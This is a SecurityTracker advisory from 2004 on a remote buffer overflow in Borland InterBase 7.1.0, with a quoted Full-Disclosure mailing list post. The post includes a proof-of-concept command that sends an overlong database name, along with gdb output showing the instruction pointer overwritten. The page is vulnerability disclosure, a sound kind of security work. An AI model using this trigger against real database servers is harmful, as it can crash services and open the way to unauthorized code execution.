SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   InterBase Vendors:   Borland
InterBase Buffer Overflow in Processing Database Name Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1010381
SecurityTracker URL:  http://securitytracker.com/id/1010381
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 3 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 7.1.0
Description:   A vulnerability was reported in the Borland InterBase database in the processing of database names. A remote user can execute arbitrary code on the target system.

KF reported that a remote user can connect to the database and send a specially crafted database name to execute arbitrary code.

A demonstration exploit command is provided:

./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`

The same type of vulnerability was previously reported in Firebird by Noam Rathaus of SecuriTeam.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.borland.com/interbase/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow


Someone that has had some success communicating things security wise to 
Borland may wish to contact them about this.

[root@CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm

[kf@CloneRiot bin]$ pwd
/opt/interbase/bin
[kf@CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`

(gdb) c
Continuing.
[New Thread 1085279152 (LWP 21355)]
[New Thread 1095769008 (LWP 21356)]
[New Thread 1106258864 (LWP 21357)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1085279152 (LWP 21355)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
#2  0x41414141 in ?? ()
...
#35 0x41414141 in ?? ()
#36 0x41414141 in ?? ()
(gdb)

(gdb) i r
eax            0x0      0
ecx            0x82025e4        136324580
edx            0x0      0
ebx            0x81fe29c        136307356
esp            0x40aff5f8       0x40aff5f8
ebp            0x41414141       0x41414141
esi            0x12c    300
edi            0x40affab8       1085274808
eip            0x41414141       0x41414141
eflags         0x10246  66118

(gdb) x/1s $esp
0x40aff5f8:      'A' <repeats 144 times>

[root@CloneRiot interbase]# ./bin/ibserver
Segmentation fault
-KF


Noam Rathaus wrote:

>On Sunday 02 June 2002 01:52, KF (lists) wrote:
>  
>
>>So is this firebird specific or does it also impact Borland Interbase
>>users?
>>-KF
>>
>>    
>>
>We haven't tested Borland's Interbase as we didn't have any installation 
>available for testing. However I can assume that since this vulnerability 
>appears in version 1.0.2, which is of very close resemblance to Borland's 
>Interbase sources, that the vulnerability may also affect it.
>
>  
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC